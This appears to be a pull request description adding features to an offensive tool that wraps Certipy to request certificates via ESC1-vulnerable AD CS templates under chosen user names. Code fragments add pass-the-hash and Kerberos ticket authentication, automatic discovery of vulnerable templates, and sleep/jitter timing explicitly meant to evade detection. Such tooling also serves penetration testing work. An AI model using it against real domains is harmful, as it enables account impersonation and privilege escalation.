Add Items From To-Do List

[ret2c]

Hi JP, spent some downtime I had and took a shot at implementing everything you had in your To-Do list. I'm not in a position to test these updates in a lab environment sadly, but I tried to do as much fuzzing as I could.

Before you try to merge, I highly recommend you give all the options a shot in a test environment.

Support alternative authentication methods such as NTLM hashes and ccache files

Added three new options and changed --password to required=False:

@click.option('-p', '--password', help='Password', required=False, type=str)
@click.option('-H', '--hashes', help='NTLM hash in format LMHASH:NTHASH or just NTHASH', required=False, type=str)
@click.option('-k', '--kerberos', help='Flag to use Kerberos authentication with ccache file', is_flag=True, default=False)
@click.option('-ccache', help='Path to ccache file for Kerberos authentication', required=False, type=str)

Added additional logic to differ between the chosen authentication method:

# Extract the part before the "@" symbol and convert it to lowercase
username = name.split('@')[0].lower()
domain = usernames_with_domains.get(f'{username}@{domain}')

 command = [certipy_client, 'req', '-u', user, '-target-ip', target_ip,
                  '-dc-ip', dc_ip, '-ca', ca, '-template', template, '-upn', name]
        
if password:
    command.extend(['-p', password])
elif hashes:
    command.extend(['-hashes', hashes])
elif kerberos:
    command.extend(['-k', '-ccache', ccache])

process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

Please test in a lab environment to ensure this runs/works properly

Automatically run "certipy find" to find and grab templates vulnerable to ESC1

I changed -template's parameter to required=False, so that if a user does not supply a known vulnerable template, it'll attempt to run the new find_vulnerable_templates() function. This function will run certipy find through subprocess and attempt to mark any templates that have ESC1 vulnerabilities. This section requires double checking in a real environment, since I don't have any Certipy output on hand to test the extrapolation with. If I need to rewrite this logic please lmk. I tried to use this site to get a feel for the output.

Add jitter and sleep options to avoid detection

I added two additional options for users:

@click.option('-s', '--sleep', help='Base sleep time between requests in seconds', required=False, type=float, default=0)
@click.option('-j', '--jitter', help='Jitter percentage (0-100)', required=False, type=float, default=0)

These options then play into this logic:

for name in tqdm(names):
        if sleep > 0:
            jitter_multiplier = 1 + (random.uniform(-jitter, jitter) / 100)
            sleep_time = sleep * jitter_multiplier
            time.sleep(sleep_time)

So with this, if a user entered the parameters of -s 2 -j 50, it would have a jitter range of -50% to +50% (mult 0.5-1.5), so the sleep time would vary between ~1-3sec.

Add type validation for all variables

Within the @click instance(s), all parameters have a type= definition. With this, I also created a new function of validate_inputs() to help try and reduce clutter within main().

[ret2c]

Also changed the README.md to include updated output, and removed the ToDo section.